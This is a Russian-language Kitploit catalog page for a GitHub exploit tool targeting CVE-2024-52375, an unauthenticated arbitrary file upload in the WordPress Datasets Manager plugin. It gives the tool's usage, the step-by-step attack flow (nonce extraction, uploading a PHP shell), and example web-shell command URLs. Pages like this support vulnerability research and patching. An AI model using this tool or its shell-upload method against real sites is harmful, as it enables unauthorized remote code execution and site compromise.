Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-52375 — Плагин WordPress Datasets Manager от Arttia Creative <= 1.5 - Уязвимость произвольной загрузки файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-52375
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2024-52375

CVE-2024-52375

Плагин WordPress Datasets Manager от Arttia Creative <= 1.5 - Уязвимость произвольной загрузки файлов

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

WordPress Datasets Manager <= 1.5 - Произвольная загрузка файлов (CVE-2024-52375)

💥 Эксплойт от: Nxploit (Khaled Alenazi)
📅 CVE опубликован: 14 ноября 2024
🧠 Оценка CVSS: 10.0 (Критический)
🛠 CWE-434: Неограниченная загрузка файла с опасным типом


📌 Описание

Критическая уязвимость была обнаружена в плагине WordPress Datasets Manager от Arttia Creative, затрагивающая все версии до 1.5 включительно.

Плагин не выполняет правильную проверку типов файлов в процессе загрузки, что позволяет неаутентифицированному злоумышленнику загружать произвольные файлы — в том числе PHP-шеллы — и добиться удаленного выполнения кода (RCE).


🧠 Детали CVE

  • CVE ID: CVE-2024-52375
  • Затронутый плагин: Datasets Manager от Arttia Creative
  • Затронутые версии: <= 1.5
  • Тип уязвимости: Произвольная загрузка файлов (без аутентификации)
  • CWE: CWE-434 - Неограниченная загрузка файла с опасным типом
  • CVSS v3.1: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  • Серьезность: 🔴 КРИТИЧЕСКАЯ (10.0)

⚙️ Требования

  • Python 3.x
  • Библиотека requests:
    root@kitploit:~
    pip install requests
    

🚀 Использование

root@kitploit:~

usage: CVE-2024-52375.py [-h] -u URL

Exploit for WordPress Datasets Manager <= 1.5 - Arbitrary File Upload | By: Nxploit | Khaled Alenazi

options:
  -h, --help     show this help message and exit
  -u, --url URL  Full target URL (e.g. http://target.com/wordpress)

Замените URL на полный путь к целевой установке WordPress.


✅ Ожидаемый результат

При успешном выполнении скрипт:

  1. Извлечет публичный _wpnonce из фронтенда.
  2. Загрузит PHP-шелл с именем nxploit.php.
  3. Проверит доступность шелла и отобразит его URL:
root@kitploit:~
[+] Shell available at:
    http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php

Затем вы можете выполнять команды, например:

root@kitploit:~
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php?cmd=id

🔒 Примечания

  • Эксплойт автоматически проверяет версию плагина через readme.txt.
  • Уязвимы только версии <= 1.5.
  • Аутентификация не требуется.


📢 Отказ от ответственности

Этот инструмент предоставляется только для образовательных и авторизованных целей тестирования.
Использование его против систем, которые вам не принадлежат или на тестирование которых у вас нет разрешения, незаконно.

Скачать инструмент